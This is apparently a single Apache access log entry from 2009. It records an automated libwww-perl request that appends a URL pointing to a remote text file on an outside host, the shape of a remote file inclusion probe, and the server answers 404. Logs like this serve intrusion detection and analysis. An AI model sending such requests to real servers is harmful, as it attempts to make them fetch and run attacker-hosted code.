211.230.156.161 - - [22/Jun/2009:01:19:29 -0400] "GET /logs/littleshell.shtm=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 283 "-" "libwww-perl/5.79"
